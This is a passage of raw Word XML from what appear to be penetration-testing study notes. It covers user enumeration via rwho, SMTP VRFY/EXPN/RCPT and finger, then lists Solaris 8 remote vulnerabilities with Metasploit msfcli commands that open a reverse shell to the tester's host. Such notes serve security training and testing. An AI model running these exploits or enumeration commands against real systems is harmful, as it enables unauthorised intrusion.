          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> –l &lt;target&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6D8E" w:rsidRDefault="009D6D8E" w:rsidP="009D6D8E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="009D6D8E">
        <w:t>•</w:t>
      </w:r>
      <w:r w:rsidRPr="009D6D8E">
        <w:tab/>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009D6D8E">
        <w:t>rwho</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="006C471C" w:rsidRPr="00590083" w:rsidRDefault="00590083" w:rsidP="006C471C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Unix</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="006C471C" w:rsidRPr="00590083">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> rwhod service listens on UDP port 513. If found to be accessible, you can query it using the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="006C471C" w:rsidRPr="00590083">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Unix</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="006C471C" w:rsidRPr="00590083">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> rwho client to list current user</w:t>
      </w:r>
      <w:r w:rsidR="007F68EC">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>s who are logged into the all</w:t>
      </w:r>
      <w:r w:rsidR="006C471C" w:rsidRPr="00590083">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> hosts</w:t>
      </w:r>
      <w:r w:rsidR="007F68EC">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> on the local network.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C471C" w:rsidRPr="00590083" w:rsidRDefault="006C471C" w:rsidP="006C471C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006C471C" w:rsidRPr="00590083" w:rsidRDefault="00590083" w:rsidP="00590083">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00590083">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidR="006C471C" w:rsidRPr="00590083">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>who</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="006C471C" w:rsidRPr="00590083">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007F68EC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>-a</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6D8E" w:rsidRDefault="009D6D8E" w:rsidP="009D6D8E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="009D6D8E">
        <w:t>•</w:t>
      </w:r>
      <w:r w:rsidRPr="009D6D8E">
        <w:tab/>
        <w:t>SMTP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00243545" w:rsidRPr="00243545" w:rsidRDefault="00243545" w:rsidP="00243545">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="117"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00243545">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>EXPN verb is used to expand details for a given email address. It can also be used to ascertain whether a user account exist on the server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00243545" w:rsidRPr="00243545" w:rsidRDefault="00243545" w:rsidP="00243545">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="117"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00243545">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>VRFY verb is used to verify if a given email address is valid so it can also be used to enumerate valid local user accounts.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00243545" w:rsidRPr="00243545" w:rsidRDefault="00243545" w:rsidP="00243545">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="117"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00243545">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>RCPT TO – this can also enumerate local user accounts as the mail server can respond with sender OK or invalid user.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00243545" w:rsidRPr="00243545" w:rsidRDefault="00243545" w:rsidP="00590083">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00243545"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VRFY –U users.txt –t &lt;target&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00243545"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EXPN –U users.txt –t &lt;target&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00590083"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RCPT –U users.txt –t &lt;target&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6D8E" w:rsidRPr="009D6D8E" w:rsidRDefault="009D6D8E" w:rsidP="009D6D8E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="009D6D8E">
        <w:t>•</w:t>
      </w:r>
      <w:r w:rsidRPr="009D6D8E">
        <w:tab/>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009D6D8E">
        <w:t>finger</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="009D6D8E" w:rsidRPr="001E5B50" w:rsidRDefault="001E5B50" w:rsidP="009D6D8E">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E5B50">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The fingerd service listens on TCP port 79. The finger client is used to connect to teh service and indentify user currently logged on to the remote machine. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E5B50" w:rsidRPr="001E5B50" w:rsidRDefault="001E5B50" w:rsidP="009D6D8E">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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@ip-address (might return all the logged in users)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"a b c d e f g </w:t>
      </w:r>
      <w:r w:rsidR="001E5B50">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">h"@ip-address (Solaris bug </w:t>
      </w:r>
      <w:r w:rsidRPr="001E5B50">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r w:rsidR="001E5B50">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="001E5B50">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> all users ( &lt; Solaris 8))</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"1 2 3 4 5 6 7 8 9 0"@ip-address (Solaris)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0@ip-address (returns users with blank GCOS entries - Solaris)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.@ip-address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**@ip-address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user@ip-address</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6D8E"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"the admin user"@192.168.1.155 (looks up in the name field)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE5626" w:rsidRDefault="00DE5626" w:rsidP="001E5B50">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00DE5626" w:rsidRPr="001E5B50" w:rsidRDefault="00DE5626"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finger</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> –l –p &lt;USER&gt;@ip-address</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>(GET PLAN)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E5B50" w:rsidRPr="00DE5626" w:rsidRDefault="001E5B50" w:rsidP="00CE2D4D">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001E5B50" w:rsidRPr="00DE5626" w:rsidRDefault="003C3551" w:rsidP="00CE2D4D">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DE5626">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>possibly</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DE5626">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> try fingerenum (although it is fairly slow)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434D06" w:rsidRDefault="009D6D8E" w:rsidP="009D6D8E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">F1b - </w:t>
      </w:r>
      <w:r w:rsidRPr="009D6D8E">
        <w:t>Understand how finger daemon derives the information that it returns,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and hence how it can be abused</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6D8E" w:rsidRPr="003C3551" w:rsidRDefault="009D6D8E" w:rsidP="009D6D8E">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6D8E" w:rsidRPr="003C3551" w:rsidRDefault="002368C3" w:rsidP="009D6D8E">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003C3551">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>finger</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003C3551">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> uses the gcos from /etc/password to check users</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6D8E" w:rsidRDefault="009D6D8E" w:rsidP="009D6D8E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">F2 - </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Unix</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6D8E" w:rsidRPr="009D6D8E" w:rsidRDefault="009D6D8E" w:rsidP="009D6D8E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">F2a - </w:t>
      </w:r>
      <w:r w:rsidRPr="009D6D8E">
        <w:t>Recent or commonly-found Solaris vulnerabilities, and in particular those for which there is ex</w:t>
      </w:r>
      <w:r>
        <w:t>ploit code in the public domain</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6D8E" w:rsidRDefault="009D6D8E" w:rsidP="009D6D8E">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A730B1" w:rsidRDefault="00A730B1" w:rsidP="00A730B1">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A730B1" w:rsidRDefault="00A730B1" w:rsidP="00A730B1">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A730B1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Solaris 8:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA5FCD" w:rsidRDefault="00FA5FCD" w:rsidP="00A730B1">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00720CDE" w:rsidRDefault="00720CDE" w:rsidP="00A730B1">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Remote:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA5FCD" w:rsidRPr="00FA5FCD" w:rsidRDefault="00FA5FCD" w:rsidP="00FA5FCD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="161"/>
        </w:numPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA5FCD">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>in.telnetd TTYPROMPT Buffer Overflow Vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA5FCD" w:rsidRPr="00FA5FCD" w:rsidRDefault="00FA5FCD" w:rsidP="00FA5FCD">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A5FCD">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>msfcli</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FA5FCD">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> solaris/telnet/ttyprompt PAYLOAD=cmd/unix/reverse RHOST=&lt;IP&gt; LHOST=&lt;MY IP&gt; E</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA5FCD" w:rsidRPr="00FA5FCD" w:rsidRDefault="00FA5FCD" w:rsidP="00FA5FCD">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA5FCD">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ttyprompt.sh &lt;IP&gt; &lt;MY IP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA5FCD" w:rsidRPr="001D1305" w:rsidRDefault="00FA5FCD" w:rsidP="00A730B1">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00584701" w:rsidRPr="00720CDE" w:rsidRDefault="00584701" w:rsidP="00720CDE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="161"/>
        </w:numPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00720CDE">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Security Vulnerability in the in.lpd Daemon</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00720CDE" w:rsidRPr="00720CDE" w:rsidRDefault="00720CDE" w:rsidP="00720CD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20CDE">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>msfcli</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00720CDE">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> solaris/lpd/sendmail_exec PAYLOAD=cmd/unix/reverse RHOST=&lt;IP&gt; E</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00584701" w:rsidRPr="00720CDE" w:rsidRDefault="00720CDE" w:rsidP="00584701">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00720CDE">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">lpd_sendmail.sh &lt;IP&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A730B1" w:rsidRPr="001D1305" w:rsidRDefault="00A730B1" w:rsidP="00A730B1">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00584701" w:rsidRPr="00720CDE" w:rsidRDefault="00584701" w:rsidP="00720CDE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="161"/>
        </w:numPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00720CDE">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CDE dtspcd Buffer Overflow Vulnerability</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35552">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>msfcli</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F35552">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> solaris/dtspcd/heap_noir     PAYLOAD=cmd/unix/reverse RHOST=&lt;IP&gt; E</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00584701" w:rsidRPr="00F35552" w:rsidRDefault="00F35552" w:rsidP="00584701">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F35552">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>solaris8_sparc_dtspcd.sh &lt;IP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00584701" w:rsidRDefault="00584701" w:rsidP="00A730B1">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CB2BC2" w:rsidRPr="00720CDE" w:rsidRDefault="00CB2BC2" w:rsidP="00720CDE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="161"/>
        </w:numPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00720CDE">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>kcms_server Daemon Issue – get file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB2BC2" w:rsidRPr="00720CDE" w:rsidRDefault="00CB2BC2" w:rsidP="00720CD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20CDE">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
